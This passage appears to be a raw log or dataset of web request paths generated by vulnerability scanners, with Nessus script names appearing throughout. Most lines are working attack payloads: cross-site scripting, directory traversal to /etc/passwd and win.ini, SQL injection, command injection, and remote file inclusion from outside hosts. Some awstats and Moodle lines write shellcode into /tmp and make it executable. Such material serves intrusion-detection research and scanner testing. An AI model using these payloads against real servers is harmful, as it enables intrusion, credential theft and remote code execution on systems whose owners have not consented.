content=\"testgfjr=1286\">\n/examples/jsp/error/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/t7tm4m0b.x?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/main.php?g2_itemid=../../../../../license\\x00\n/zuihld5m.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"del\\xa0q71425977&rem\\xa0\n/en-us/odzk29aa.cfm?<script>document.cookie=\"testtfvh=2141;\"</script>\n/javascript/.htaccess/'\"'\"'\"'\"\n/de3v2dd9.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"|ping\\x09-w\\x097000\\x09-n\\x091\\x091.2.3.4|rem\\x09\n/en-us/fo564rei.exe?<script>cross_site_scripting.nasl</script>\n/setup/setup-/../../log.jsp?log=info&mode=asc&lines=10\n/examples/servlets/servlet/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/cgi.cgi/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/top.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width=q66155717\n/javascript/faqs.exe\n/slscript/\n/phpmyadmin/sgdynamo.exe?htname=<script>foo</script>\n/javascript/signed.exe\n/xsqln7eb.pl?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/en-us/i686v90l.cfm?<script>document.cookie=\"testfutf=1550;\"</script>\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/cgi-local/listrec.pl?app=qmh-news&template=;ls /etc|\n/scripts/gdxlwjnlsr6i.sh\n/d7ktpmcq.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/javascript.php?abs_path=/etc/passwd\\x00\n/en-us/oie504mr.pl?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/fmnveedu.html?<script>document.cookie=\"testgfbr=7014;\"</script>\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"zj\\0003x\\0315\\0200xp1\\0322\\0262\\0377\\0266\\0377\\0001\\0320\" >> /tmp/wrkvkjjzem0;echo|awstats648649.txt\n/recordings/sawmillcl.exe?ho+{complete_version}\n/passwd-safe/\n/manager/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/iv5vkgam.dll?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/examples/jsp/jsp2/el/check_user_id.php?user_id=<script>foo</script>\n/index.php?src=1&_common=1&time=1332009308&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/javascript/inbound.exe\n/phpmyadmin///../../../../../../../..etc/passwd\n/cgibin/sensepost.exe?/c+dir\n/zv8tv7h8.mscgi?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/uvazfs7p.kspx?<script>document.cookie=\"testwtbo=4831;\"</script>\n/scripts/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/scripts/mt/\n/b1q8bywu.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='\\x0duname\\x09>q63353886\\x09#\n/g8nu2yy7.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/tramadol-prescription/\n/examples/jsp/jsp2/jspx/webplus.exe?script=webplus_install_path.nasl\n/cacti/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/nuh3zirz.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/news/scripts/news_page.php?script_path=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/subscriptions.test\n/manager/listrec.pl?app=qmh-news&template=;ls /etc|\n/main.php?stuff=\"&ver\\x09>q48424932&rem\\x09\n/examples/jsp/cal/phptonuke.php?filnavn=/etc/passwd\n/test.php?evalme=eval($_server[http_x_mbnqgczvafwyars]);\n/scripts/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/sessions/config.php?returnpath=/etc/passwd\\x00\n/cacti/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../vtigerservice.php\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+debug<esbql>olnb\n/main.php?stuff=\"\\x0adel q16731133 #\n/zln2hm2z.cfc?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/wgwvwkorhp.sh;echo|awstats103474.txt\n/top.php?stuff=&del;q25243259&rem;\n/1r8cfrlf.htm?<script>document.cookie=\"testydan=5106;\"</script>\n/javascript/room.exe\n/0qhcnefz.php?<script>cross_site_scripting.nasl</script>\n/8x6w469u.cgi?<script>document.cookie=\"testgfjr=1286;\"</script>\n/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/comments.php?subject=<script>alert('vulnerable')</script>&comment=<script>alert('vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=preview\n/mail.php?id='/**/union/**/select/**/1,2,1331919225,4--&blog=1\n/cgis/.htpasswd\n/javascript/buynow.exe\n/comments.php?scriptpath=http://192.168.202.96:8080/llumt7msyau5y??\n/pxagj7n7.pl?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/profil.php?id=1 <script>foo</script>\n/brian's guide to solving any perl problem/\n/en-us/esmozg5d.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iajtej82.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fc9t54l7.idc?<script>document.cookie=\"testggad=2000;\"</script>\n/rpxyx07v.fts?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/nsn/..\\util/slist.bas\n/en-us/i686v90l.exe?<script>document.cookie=\"testfutf=1550;\"</script>\n/examples/jsp/sessions/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/j734qobz.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.118:8080/zz5thkvtmlgl?\n/top.php?stuff=\"ping,-w,11000,-n,1,1.2.3.4&rem,\n/script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/queen's-quest/\n/jnt3f86c.fts?<script>document.cookie=\"testcmax=9270;\"</script>\n/phpmyadmin/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/e9rx3ya4.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/sunos.exe\n/examples/jsp/jsp2/el/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat /etc/passwd|\n/javascript/charge.exe\n/help.php?q=\"&ping,-w,7000,-n,1,4.3.2.1&rem,\n/scripts/webc.cgi/\n/examples/jsp/jsp2/jspx/index.php?id='union/**/select/**/0,0,1843478711,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/examples/jsp/sessions/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/examples/jsp/checkbox/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/examples/jsp/checkbox/protection.php?action=logout&siteurl=/etc/passwd\n/help.php?q=\";del q19897274 #\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/whmch8ftkt7kv?\n/3hlysl2x.cgi?<script>document.cookie=\"testgjbe=8505;\"</script>\n/recordings/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/top.php?stuff=\"&rm\\x09q43482464&rem\\x09\n/hipkz026.pl?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/manager/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/n1afe1y6.x?<script>cross_site_scripting.nasl</script>\n/apavxugx.kspx?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/javascript/system.exe\n/admin/geo_zones.php?zone=<script>alert(414465594707)</script>\n/main.php?stuff=\"|ping;-w;9000;-n;1;1.2.3.4|rem;\n/top.php?stuff=\"&del\\x0bq71858742&rem\\x0b\n/forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\n/scripts/h3d1n9eaqxv3.cgi\n/cacti/index.php?src=1&_common=1&time=1331909415&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/scripts/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_8ypa_2_i]));die;/*\n/exchange/..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/scripts/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/gy23xnjq.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/admin/utilities_confighelp.asp?helpfield=-1') union select configval as confighelp from storeadmin where configvar='storeversion' or ('1'='2\n/javascript/pipe.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+64+6c+6c+20+47+65+74+50+72+6f+63+41+64+64+72+65+73+73+4c+6f+61+64+4c+69+62++>>esbq\n/examples/jsp/sessions/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/administrator/upload.php?newbanner=1&choice=\\\"<script>alert(document.cookie)</script>\n/main.php?logout=\"ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/fnwhrxyd.exe?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/scripts/nph-test-cgi?*\n//../../../../../../../../../winnt/win.ini\n/help.php?q=&ver\\x0c>q41583174&rem\\x0c\n/iv5vkgam.exe?<script>document.cookie=\"testfosd=94;\"</script>\n/examples/jsp/sessions/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/bin/ppdscgi.exe\n/main.php?logout=&ping;-w;10000;-n;1;4.3.2.1&rem;\n/gvx7m5ti.aspx?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/examples/jsp/num/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\\boot.ini\n/cgi-win/htimage.exe/path/filename?2,2\n/examples/jsp/error/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/main.php?stuff=\"&rm\\x09q61351616\\x09#\n/examples/jsp/jsp2/el/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/main.php?logout=\\x0duname\\x09>q68569555\\x09#\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 878723476--\n/scripts/kfzqb5x87lvq.inc\n/snavnoscript/\n/javascript/htpasswd.pem\n/main.php?logout=@'\n/en-us/w4996nr0.jspa?<script>document.cookie=\"testttvs=7163;\"</script>\n/b1q8bywu.x?<script>cross_site_scripting.nasl</script>\n/en-us/account/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/examples/jsp/error/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;/tmp/rkejrxdjgj;\"\n/help.php?q=\"ping;-w;7000;-n;1;1.2.3.4|rem;\n/phpmyadmin/bb-hist.sh?histfile=../../../../../etc/passwd\n/?<script>document.cookie=\"testmybc=2088;\"</script>\n/forumdisplay.php?globals[]=1&f=2&comma=\\\".system('id').\\\"\n/scripts/shop/auth_data/auth_user_file.txt\n/examples/jsp/jsp2/el/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/main.php?logout=\";rm\\x09q28427886\\x09#\n/en-us/account/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/examples/jsp/num/search=<script>alert('xss')</script>\n/noscriptclickthrough/\n//</p><body><script src=http://www.example.com/test?rnd=q36276247></script><p>\n/scripts/vzdybnanqpc3.html\n/scripts/gallery.scr.php?globals[pth][func]=http://cirt.net/rfiinc.txt??\n/ghswfouu.jspa?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/examples/servlets/servlet/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/0qhcnefz.idc?<script>cross_site_scripting.nasl</script>\n/yef5f3d5.aspx?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/phpmyadmin/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/dda2qr7j.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/rot13sj.cgi?/etc/passwd\n/subscriptiont1/\n/scripts/robadmin.cgi\n/n1afe1y6.exe?<script>cross_site_scripting.nasl</script>\n/main.php?stuff='del q95495989 #\n/scripts/zdbyw3dn3gh2.cfm\n/bcnewfreesubscriptionicon/\n/main.php?logout=\"ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/xsqln7eb.nsf?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/h21y8w52.do?<script>cross_site_scripting.nasl</script>\n/m5103snj.asp?<script>cross_site_scripting.nasl</script>\n/5qnlm5z2.asp?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/6dlc2zm9.pl?<script>document.cookie=\"testqpux=4016;\"</script>\n/scripts/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/top.php?stuff=\"ver\\xa0>q69465625&rem\\xa0\n/javascript/phones.exe\n/help.php?q=\"&ping;-w;9000;-n;1;4.3.2.1&rem;\n/rocko's/\n/en-us/account/bb-hist.sh?histfile=../../../../../etc/passwd\n/esmozg5d.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/j4drbkil.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='sleep 8 #\n/examples/jsp/cal/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/d44uk9h2.mscgi?<script>document.cookie=\"testmybc=2088;\"</script>\n/examples/servlets/servlet/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/top.php?stuff=\"\\x0dsleep 7 #\n/javascript/thumbnails.exe\n/ttxssh2_100alpha4/\n/include/scripts/run_auto_suspend.cron.php?dir=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/examples/jsp/colors/index.cfm?fuseaction=category.display&category_id='\n/abc_subscription/\n/cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd\n/examples/servlets/servlet/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/javascript/about.exe\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331904669\")</script>\n/jnv890lt.asp?<script>cross_site_scripting.nasl</script>\n/y8pmygrp.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/kaleidoscope_'95/\n/odzk29aa.html?<script>document.cookie=\"testtfvh=2141;\"</script>\n/scriptextensions/\n/javascript/proxy.exe\n/help.php?q=\"&del\\x0bq72412482&rem\\x0b\n/cacti/install.php?newlang=../../cpg_error.log\\x00\n/gvx7m5ti.cfc?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/scripts/nffhikq061nq.pl\n/scripts/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/gvx7m5ti.jsp?<script>document.cookie=\"testwldz=3506;\"</script>\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script>','0','0','0','0');waitfor delay '0:0:15';--\n/uvazfs7p.dll?<script>document.cookie=\"testwtbo=4831;\"</script>\n/scripts/index.php?board=nonexistant903393125\n/n9xlumt5.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/squirrel.exe\n/l752x1ry.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/b1q8bywu.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff='\\x0drm q83658658 #\n/scripts/u7m5ok8eqpfy.shtml\n/javascript/dblclk.exe\n/cgi-bin/ion-p.exe?page=c:\\winnt\\repair\\sam\n/pyscripter-setup/\n/recordings/index.php?post=../config/password\n/phpmyadmin/shopper.cgi?newpage=../../../../../../etc/passwd\n/phpmyadmin/sql.php3?server=000&cfgservers[000][host]=hello&btndrop=no&goto=/etc/passwd\n/examples/jsp/jsp2/el/base_qry_common.php?base_path=/etc/passwd\\x00\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/top.php%3fstuff%3d1583574484&frm_user=&scr_height=q91648711&scr_width=\n/i2n4v4rl.aspx?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"&ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/scripts/browsewebalizerexe.asp\n/i2n4v4rl.dll?<script>cross_site_scripting.nasl</script>\n/1qwv2p5p.jspa?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/cacti/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/ywaxntrx.html?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\";uname >q17551646 #\n/scripts/nph-exploitscanget.cgi?host=`id`&port=80&errchk=0&idsbypass=0\n/top.php?stuff=ver\\x09>q47128751&rem\\x09\n/vbscript_tutorials/\n/index.php?action=item&id=\"><script>alert(\"414266083569\");</script>\n/hrttz9fj.x?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/9o6g5vkn.php?<script>cross_site_scripting.nasl</script>\n/en-us/account/mail.php?id='/**/union/**/select/**/1,2,1331905235,4--&blog=1\n/7u1pb2xi.aspx?<script>document.cookie=\"testlwwz=718;\"</script>\n/stat/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/phpmyadmin/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/8x6w469u.do?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/examples/jsp/num/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/cacti/shoutbox.php?conf=../../../../../../../../etc/passwd\n/javascript/components.exe\n/zv8tv7h8.php?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/help.php?q=ver\\x0c>q77626753&rem\\x0c\n/main.php?stuff=\"ver\\x0c>q95513284&rem\\x0c\n/phpmyadmin/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+00+00+00+00+00+01+00+00+0e+1f+ba+0e+00+b4+09+cd+21+b8+01++>>ctdn\n/scriptwriter/\n/examples/jsp/jsp2/jspx/edit.jsp?page=user&editor=../../../install\n/xfkun1ku.asp?<script>cross_site_scripting.nasl</script>\n/recordings/save.php?file_save=/etc/passwd\n/cgi-bin/pbcgi.exe\n/<meta http-equiv=set-cookie content=\"testulex=4996\">\n/iv5vkgam.asp?<script>document.cookie=\"testfosd=94;\"</script>\n/scripts/nryr3lvrjnwx.inc\nindex.html?..\\..\\..\\..\\..\\boot.ini\n/vhzmaia2.htm?<script>document.cookie=\"testkogj=3979;\"</script>\n/qb2xy9aw.jspa?<script>cross_site_scripting.nasl</script>\n/rpxyx07v.htm?<script>document.cookie=\"testbnli=1975;\"</script>\n/scripts/query?group=--\n/examples/servlets/servlet/man-cgi?section=0&topic=ls;id\n/examples/jsp/jsp2/jspx/webplus?script=/../../../../etc/passwd\n/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/sessions/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/examples/jsp/error/doc/index.php?s=/etc/passwd\\x00\n//q32152879&q1741\"q1741<q1741>q32152879\n/rv98iwjp.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/lo.exe\n/6dlc2zm9.cfm?<script>document.cookie=\"testqpux=4016;\"</script>\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"h\\0300\\0250\\0312fh\\0002\\0000\\0343\\0315\\0211\\0340j\\0020pr\" >> /tmp/wrkvkjjzem0;echo|awstats850876.txt\n/en-us/ddoworrl.cgi?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/x7pclv4s.pl?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/phpmyadmin/_mmserverscripts/mmhttpdb.asp\n/cacti/admin/admin.php?sid='\n/ao22ww7y.fts?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1332008614\n/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/recordings/index.php?string='\n/javascript/dump.exe\n/b4vng02k.mscgi?<script>document.cookie=\"testtrlh=3672;\"</script>\n/iktok2bw.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/ddoworrl.nsf?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n///../../../../../../../..etc/passwd\n/jnv890lt.do?<script>cross_site_scripting.nasl</script>\n/lang/index.php?file=/etc/passwd\n/examples/jsp/checkbox/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/cacti/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/javascript/surveys.exe\n/raanw4ia.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"del\\x0bq14893241&rem\\x0b\n/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\\x00\n/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/edv3mapy.htm?<script>cross_site_scripting.nasl</script>\n/6wb70v0b.cgi?<script>cross_site_scripting.nasl</script>\n/7u1pb2xi.pl?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/g8nu2yy7.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/kfzqb5x87lvq.sh\n/subscriptions.out\n/javascript/scans.exe\n/cacti/index.php?setlang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd\n/examples/servlets/servlet/shoutbox.php?conf=../\n/help.php?q=&rm;q15387485&rem;\n/public/proxy.php?url=<script>alert('clarkconnect_url_xss.nasl')</script>\n/manager/index.php?cat='\n/help.php?q=\"&sleep 9 #\n/scripts/include/sql.php?include_path=/etc/passwd\\x00\n/script_path/config.inc.php?_path=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/top.php?stuff=\\x0duname\\x09>q36565521\\x09#\n/1r8cfrlf.aspx?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/fpnpp5zg.html?<meta http-equiv=set-cookie content=\"testyias=101\">\n/citrix//accessplatform/auth/clientscripts/cookies.js\n/h5sc3gxy.aspx?<script>cross_site_scripting.nasl</script>\n/scripts/browse_item_details.asp?item_id='webstores_browseitemdetails_sql_injection.nasl\n/top.php?stuff=\"ping,-w,10000,-n,1,4.3.2.1&rem,\n/tramadolhydrochloridedescription/\n/zv8tv7h8.idc?<script>document.cookie=\"testcqwz=9752;\"</script>\n/cgi-bin/mylog.html?screen=/etc/passwd\n/scripts/chat/login.php?option=chat\n/cleartrust/ct_logon.asp?ctloginerrormsg=<script>alert(1)</script>\n/t578vqea.kspx?<script>document.cookie=\"testsory=7676;\"</script>\n/examples/jsp/cal/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\\x00\n/examples/jsp/error/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/cheapxanaxnoprescription/\n/bzuf9ozq.php3?<script>cross_site_scripting.nasl</script>\n/j734qobz.pl?<script>cross_site_scripting.nasl</script>\n/main.php?stuff='rm q73795897 #\n/edv3mapy.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/<script>document.cookie=\"testtfvh=2141;\"</script>\n/subscriptions.stackdump\n/main.php?stuff=\"&del\\x0cq69516617&rem\\x0c\n/apavxugx.php3?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/javascript/_test.exe\n/_mem_bin/..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/examples/servlets/servlet/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/qczkquis.x?<script>document.cookie=\"testkwlg=5591;\"</script>\n/cacti/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/l4fz1dqw.php3?<script>cross_site_scripting.nasl</script>\n/help.php?q=;sleep 10 #\n/vhzmaia2.html?<script>document.cookie=\"testkogj=3979;\"</script>\n/top.php?stuff=\"ping;-w;9000;-n;1;4.3.2.1|rem;\n/examples/jsp/cal/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/lcqujjmwty.sh;echo|awstats233827.txt\n/scripts/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/include/scripts/send_email_cache.php?dir=http://cirt.net/rfiinc.txt?\n/javascript/archive.exe\n/l752x1ry.do?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"&del q91375949&rem \n/lmw4r201.mscgi?<script>document.cookie=\"testwews=8477;\"</script>\n/main.php?logout=\"&rm\\x0bq41987339&rem\\x0b\n/recordings/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/javascript/czcmdcvt.exe\n/js56jsorijscript/\n/examples/jsp/checkbox/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/help.php?q=\";uname >q25549328 #\n/zln2hm2z.exe?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/cgi-bin/www/delivery/ac.php?bannerid=-1331905039+or+1=1+--+';passthru(base64_decode($_server[http_nessus_evc6w6sf]));die;/*\n/examples/servlets/servlet/lang/lang.php?lang_path=/etc/passwd\\x00\n/iktok2bw.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl\n/examples/jsp/checkbox/config.php?returnpath=/etc/passwd\\x00\n/odzk29aa.cfm?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/phpmyadmin/index.php?module=<script>foo</script>\n/b1q8bywu.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/acyclovir_prescription/\n/en-us/i686v90l.php3?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/examples/jsp/jsp2/el/port.php?proto=tcp'\n/cgi-bin/story.pl?next=../../../../../etc/passwd\\x00\n/main.php?logout=\"ping -w 7000 -n 1 4.3.2.1&rem \n/en-us/account/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/lsoix5h3.pl?<script>cross_site_scripting.nasl</script>\n/cgi-bin/shops/sub.asp?isub=duamazon_sql_injections.nasl'\n/main.php?stuff=\"ping\\x09-w\\x0910000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/whxssthreats/\n/help.php?q=\"&del;q69128354&rem;\n/help.php?q=\";uname\\x09>q51344488\\x09#\n/o6ebbirj.mscgi?<script>cross_site_scripting.nasl</script>\n/main.php?logout='|sleep 7 #\n/scripts/rx9ysf2iwv4j.php3\n/ao22ww7y.idc?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/index.php?errcode=<script>alert(\"413375588092\");</script>\n/main.php?stuff=\"ver\\x0c>q45919726&rem\\x0c\n/member/usercp_menu.php?script_folder=http://cirt.net/rfiinc.txt?\n/javascript/phone.exe\n/javascript/htpasswd.jhtml\n/gy23xnjq.pl?<script>cross_site_scripting.nasl</script>\n/javascript/v2.exe\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919216,1114321675 -- \n/recordings/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/examples/jsp/sessions/shopexd.asp?catalogid='42\n/help.php?q='&del q65268232 #\n/s7qus4g3.aspx?<script>cross_site_scripting.nasl</script>\n/1qwv2p5p.do?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/scripts/index.php?action=logout&sesc=1\n/javascript/postgres.exe\n/index.php?src=1&_common=1&time=1332010418&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/help.php?q=\"del q92991511 #\n/javascript/.passwd.out\n/subscriptions.exe\n/examples/jsp/error/config.php?path[docroot]=/etc/passwd\\x00\n/help.php?q=\"rm q26428197&rem 